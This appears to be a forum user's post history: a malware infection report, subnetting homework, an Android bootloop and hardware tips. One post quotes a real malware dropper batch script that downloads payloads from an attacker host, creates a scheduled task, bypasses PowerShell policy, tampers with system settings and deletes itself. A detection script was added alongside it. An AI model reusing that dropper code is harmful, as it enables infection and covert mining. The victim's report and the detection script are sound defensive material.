ciprian97pop

Everything posted by ciprian97pop

  1. I... I really don't know. It's more embarrassing as I work as a system administrator and I should be the one stopping things like this from happening. If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in Windows, so I used TestDisk to recover some files. Maybe that was the moment in which I got that.
  2. Yep. Malwarebytes got rid of it. I will keep doing some daily scans until next week just to be sure.
  3. Hi again. So... yeah. Today I installed Malwarebytes and let's just say that that wasn't a Windows event reporter. Again, thank you guys for your involvement.
  4. Thank you guys for your replies. I will stop killing the process and let it run, hoping it will disappear soon. Just hoping that I won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted. P.S.: Making a backup on Google Drive with my most important files just to be safe.
  5. Are you sure? Why would it need to consume that much CPU if it's just some event monitor? I also read that article but didn't think much of it.
  6. Hello everyone. Today I noticed a weird process showing up in Task Manager that's constantly consuming 45-50% of my CPU all the time. The process is called sysmon.exe and I've been aware of it since a few hours ago. Every time I kill the process it comes back. It also creates the .exe in the AppData/Temp folder. I've searched online but I didn't find almost anything about it. Also, I'm in the process of downloading an antivirus (I used Windows Defender because I don't download or use suspicious stuff). I also thought that it might be some sort of coin miner but it wasn't using any internet. Here's a screenshot of it: Also, here's the path to the file.

     UPDATE: After some more digging, I found out that every time, it creates a temp_XXXX folder (where XXXX are random numbers) and in that folder it also creates 3 .bat files. The start.bat file is just running the build.bat file, but here's what I found when I opened the build.bat file. At this point I'm 99% sure that this is some kind of coin miner/malware. Here comes the fun part. This is what I found when I opened the upd.bat file:

     <spoiler>
     ping www.google.com -n 1 -w 1000
     if %errorlevel% == 1 ( exit )
     if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\"" )
     if not exist "%TEMP%\ppuarchive4.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\"" )
     if not exist "%TEMP%\bcmuarchive12.zip" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\"" )
     if not exist "%TEMP%\tmg.ps1" ( PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\"" )
     if not exist "%TEMP%\opokl.txt" (
         PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
         PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
         schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
         del "%TEMP%\svctask.xml"
         echo a > "%TEMP%\opokl.txt"
     )
     if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
         PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
         "%TEMP%\batchinstaller.bat"
     )
     set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1
     (for %%a in (%list%) do (
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
         powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
     ))
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
     powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
     powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
     if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
         "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
         "%~dp0\packagenew\buildpassive.bat"
         echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
         rmdir /s /q "%~dp0\packagenew"
     )
     taskkill /f /im sysmon.exe
     ::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
     ::if "%ERRORLEVEL%"=="0" exit
     "%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
     "%~dp0\packagehwloc\start.bat"
     start /b "" cmd /c del "%~dp0\upd.bat"&exit /b
     </spoiler>

     Yeah, so it surely is a virus or some sort of malware. Could someone explain to me what that code does? It would help a lot. Also, any suggestions would be greatly appreciated. Thank you.
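As an added example (not part of the thread), a small static triage script that answers the "what does that code do" question from a defender's side: it reads a batch file and flags the behaviours the quoted upd.bat shows (Invoke-WebRequest downloads, schtasks persistence, ExecutionPolicy Bypass, powercfg and TdrDelay tampering, killing a process named like a Sysmon binary, self-deletion). Rule names and the verdict thresholds are my own; the sample input is constructed from the quoted script with the domain and the infohash list replaced by placeholders.

```python
import re
# One rule per behaviour the quoted upd.bat exhibits; cmd.exe and PowerShell
# are case-insensitive, so every pattern is compiled with re.I.
RULES = {
    "download":       r"invoke-webrequest|\biwr\b|bitsadmin|certutil.*-urlcache",
    "scheduled_task": r"schtasks\s+/create",
    "policy_bypass":  r"-executionpolicy\s+bypass",
    "power_tamper":   r"powercfg\s+/set(?:ac|dc)valueindex",
    "tdr_tamper":     r"graphicsdrivers.*\btdrdelay\b",
    "proc_kill":      r"taskkill\s+/f\s+/im\s+\S+",
    "archive_unpack": r'7za?\.exe"?\s+x\b',
    "self_delete":    r'del\s+"?%~dp0\\[^"\s]*\.bat',
}
COMPILED = {tag: re.compile(pat, re.I) for tag, pat in RULES.items()}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
KILL_RE = re.compile(r"taskkill\s+/f\s+/im\s+(\S+)", re.I)

def triage(batch_text):
    """Map each rule tag to the (1-based) lines that hit; also collect URLs and killed images."""
    hits, urls, killed = {}, [], []
    for no, raw in enumerate(batch_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("::") or line.lower().startswith("rem "):
            continue  # cmd.exe comment lines never execute
        for tag, rx in COMPILED.items():
            if rx.search(line):
                hits.setdefault(tag, []).append(no)
        urls.extend(URL_RE.findall(line))
        killed.extend(m.group(1).lower() for m in KILL_RE.finditer(line))
    return {"hits": hits, "urls": sorted(set(urls)), "killed": sorted(set(killed))}

def verdict(report):
    """Download + persistence + tamper/evasion together is the dropper pattern."""
    h = report["hits"]
    stages = ["download" in h, "scheduled_task" in h,
              any(t in h for t in ("power_tamper", "tdr_tamper", "proc_kill", "self_delete"))]
    return "malicious" if all(stages) else "suspicious" if any(stages) else "clean"

# Constructed sample modelled on the quoted upd.bat (domain and infohash replaced).
SAMPLE = r'''if not exist "%TEMP%\7za.exe" ( PowerShell -Command "Invoke-WebRequest -Uri http://PLACEHOLDER.example/7za.exe -OutFile \"%TEMP%\7za.exe\"" )
schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.example 6969 DUMMYHASH 90
powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
taskkill /f /im sysmon.exe
::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
"%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
start /b "" cmd /c del "%~dp0\upd.bat"&exit /b
'''
```

Running `verdict(triage(SAMPLE))` on the constructed sample yields "malicious"; the per-line hits point at the scheduled task name and the killed image, which is exactly what to look for when cleaning up (the task and the file under %LOCALAPPDATA%).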
  7. Link to the contest: https://www.reddit.com/r/dogecoin/comments/7kvpy7/video_contest_18_million_doge_to_celebrate_2018/ So basically the guys over on the dogecoin Reddit page are organising a contest celebrating that the year 2018 will be the year of the dog. To enter the contest you have to create a short and fun video regarding dogecoin and that's it. The craziest part is that right now, 18.000.000 dogecoins are worth about $144.000. Also, today dogecoin has reached an all-time high of $0.008768. P.S.: I am making this topic just to get more people to participate. I am not affiliated in any shape or form with the guys over there and I gain nothing from making this topic; I just wanna make more people aware of this contest, and if this violates the rules I'm sorry and I will accept all the consequences.
  8. Thank you for all the links and all the help from the previous post. It would be logical to create different subnets for different parts of the network and for different building storeys, but thankfully the assignment doesn't have to be that complex. Yeah, it could be, but the extra points that I would be getting for doing that aren't worth the effort because the assignment also has an economic part which includes things like the cost of the whole operation, amortization of equipment and many others. This was just a part of it. Thank you again for everyone's help.
  9. My bad, by the last address I was thinking of x.x.x.254 and by the first of x.x.x.1. In the router config I have a few tabs. The first tab is LAN, in which I have the router's IP address (192.168.0.1). The second tab is Internet, in which I have these boxes (see the screenshot below). It's named "wi fi free" because I've got the same router set as the free Wi-Fi part of the network. If I set the default gateway like this, to the last address, and the IP address as being the first one, on the PCs which should I put as the default gateway, the one with 254 at the end? Edit: in the screenshot the DG is .2.254 but I've changed it to .3.254.
  10. Got it. I've set the default gateway to 10.0.3.254. The subnet mask auto-filled to 255.255.0.0 but I was able to change it this time without a problem to 255.255.252.0, and I started giving IP addresses to PCs from 10.0.0.2 (because I gave 10.0.0.1 to the main router) and now it works. Thank you for your help. P.S.: Should the default gateway be the last IP address of the interval, like I've set it to be? It's a question that I keep asking myself.
  11. This ^. Get the 1400 and spend the extra money on a 470/570/480/580 and then maybe try to save up for a CPU cooler for OC. Edit: if you already have the 1050 Ti bought, still get the 1400 and invest the money in something else like a CPU cooler.
  12. The CPU has nothing to do with the chipset of the board as long as it's an AM4 board.
  13. Whichever one is the cheapest. You don't have a big budget and the speed difference between those drives is at most 20-30 MB/s, a difference which you won't notice.
  14. Hey everyone. I have an assignment to make for my networking class but I'm stuck on something. I have to make a computer network for a business with 950 hosts. I've thought to make it an IT company that has the following structure: 600 hosts for the IT and programming department (500 hosts for desktops and a private Wi-Fi network for 100 laptops), 200 hosts for the marketing and HR department and another 150 hosts for public free Wi-Fi. The first step is to calculate the subnet mask, right? That's what I did. My subnet mask is 255.255.252.0 (because 2^9 is 512, which is not enough, and 2^10 is 1024). Now here comes my question. I know that I can use 1024 IPs, which is more than enough for me, but what interval of IPs can I use? At first I thought that I can use any kind of private IPs (like 10.x.x.x or 177.(21-32).x.x or 192.168.x.x), but if I put in Cisco Packet Tracer (the program in which I have to exemplify the network) 10.0.0.1 as an IP for a PC, it changes my subnet mask to 255.0.0.0 (that's what I remember it changing it to). If I set the subnet mask first to 255.255.252.0 and then enter an IP, it gives me an error and I cannot continue. Can you please tell me what I am doing wrong, and what is the IP interval that I can use? Thank you.
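As an added worked example (not from the thread), the subnet arithmetic behind the 950-host network above, using Python's standard ipaddress module: it derives the /22 (255.255.252.0) from the host count, gives the usable range 10.0.0.1 to 10.0.3.254 with broadcast 10.0.3.255, and shows the 255.0.0.0 that the simulator auto-fills as the old classful default for a 10.x.x.x address. Function names are my own.

```python
import ipaddress

def prefix_for_hosts(hosts):
    """Smallest prefix whose block leaves `hosts` usable addresses after
    reserving the network and broadcast addresses."""
    host_bits = (hosts + 1).bit_length()   # ceil(log2(hosts + 2)) without floats
    return 32 - host_bits

def classful_prefix(ip):
    """Legacy class A/B/C default that simulators such as Packet Tracer
    auto-fill from the first octet until the mask is corrected by hand."""
    first_octet = int(ipaddress.IPv4Address(ip)) >> 24
    if first_octet < 128:
        return 8
    if first_octet < 192:
        return 16
    return 24

def plan(base_ip, hosts):
    """Address plan for `hosts` stations in the block containing `base_ip`."""
    prefix = prefix_for_hosts(hosts)
    net = ipaddress.IPv4Network(f"{base_ip}/{prefix}", strict=False)
    classful = ipaddress.IPv4Network(f"{base_ip}/{classful_prefix(base_ip)}", strict=False)
    return {
        "prefix": prefix,
        "netmask": str(net.netmask),
        "network": str(net.network_address),
        "first_host": str(net.network_address + 1),
        "last_host": str(net.broadcast_address - 1),
        "broadcast": str(net.broadcast_address),
        "usable": net.num_addresses - 2,
        "classful_netmask": str(classful.netmask),   # what the tool guessed
    }

def in_plan(p, ip):
    """True if `ip` is a usable host address inside the planned block."""
    net = ipaddress.IPv4Network(f"{p['network']}/{p['prefix']}")
    addr = ipaddress.IPv4Address(ip)
    return addr in net and addr not in (net.network_address, net.broadcast_address)

# Constructed check on the 950-host network discussed above.
PLAN = plan("10.0.0.1", 950)   # /22, hosts 10.0.0.1 .. 10.0.3.254, broadcast 10.0.3.255
```

`in_plan(PLAN, "10.0.3.254")` confirms the gateway address chosen later in the thread is a valid host in the block, while 10.0.3.255 (broadcast) and anything in 10.0.4.x are not.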
  15. Somehow maybe the ROM was the problem. I tried copying another ROM with the same method mentioned above, renamed it and I was able to install it without any problems. Thank you very much for your help.
  16. Yep... copied the file with a .zip.o extension without a problem. Now I'm gonna rename it in the TWRP file explorer and try to flash it again.
  17. Long story short, I simply tried to flash a corrupted zip and I got an error right after I pressed install on the ROM. That's why I'm trying to be as calm as possible, because I'm guessing that it's not such a big deal. I tried copying another file, this time a .rar, to my phone and it worked. Now I'm trying to copy the ROM but with a different extension, just to see if it works. If it does, then I'll rename it to .zip again and try the flashing process once more.
  18. So it's not the end of the world, right? I just have to flash a stock ROM with Odin and then I'm good to go. Another question: the custom ROM that I want to install doesn't need the phone to be rooted because it has Magisk, which will root the phone after installation (most of the ROMs that I saw work like this). Is it a bad thing that I had rooted the phone before, or won't it make any difference?
  19. I have a Galaxy S6 920F on which I had the XEF 7.0 Android (it is a phone bought from Orange Romania, SIM locked, and the CSC was ORO). I installed TWRP on it and after that I rooted it by flashing a zip file with TWRP. Then I wanted to install a custom ROM. I copied the file to the phone but I wasn't paying attention and the copy process stopped in the middle of it, but the file was still on the phone. I wiped everything that was asked to be wiped, then proceeded to install the zip, only to find out that the installation ended after about 30 seconds. I tried rebooting and I'm stuck in a bootloop. Even so, I can still enter download mode and the recovery, but I wiped all those things (everything except internal storage and USB OTG). I know that I should have checked to see if the file was being copied fully, but even now when I connect the phone to my laptop in the recovery to copy the zip, it still does the same thing. I tried using another USB cable, another USB port and even another laptop, but the copy process still stops about halfway through. Right now I'm downloading a stock ROM and gonna try to flash it with Odin. What should I do? Any help is appreciated.
  20. Glad you like it. You know how they say: once you go (AMOLED) black, you never go back.
  21. From what I know the 6P doesn't have many issues. Just look for the usual stuff: play a YouTube video, call from it to test the speakers and mics, do a couple of test photos, put your SIM card in. You can also try to look for burn-in on the screen by maxing the brightness and looking at a white picture. It's almost useless to do this because today's AMOLED screens are much improved, but it's better to be safe than sorry.
  22. About one year ago I installed an app on my phone that served as an always-on display that would activate when you'd pull it out of your pocket or when you'd grab it from the table. It was very simple looking, like the way the Motorola notification display looked on the first Moto X (if anyone remembers). It would show you the time and notifications if you had any, and a small lock icon in the middle which you could drag down to get to your normal lock screen. If you know the name of the app please let me know. Thanks.
  23. Sorry for the late reply. That didn't help either, but I found a link to a Dell tutorial on how to downgrade your BIOS version. I did that and got back to the original BIOS, but the problem still persists. Any other suggestions? I don't think that there is something else that I can do... nothing comes to mind.
  24. Sorry for the double quote, but look what I thought of. Let's say that the problem is with my BIOS. Wouldn't switching to UEFI or EFI mode fix the problem?
  25. Right now I'm reinstalling Windows. Let's hope that this fixes the problem. If not, I'll try to disable the card reader because I never used it. If that also doesn't work, I'll know that the BIOS is the problem.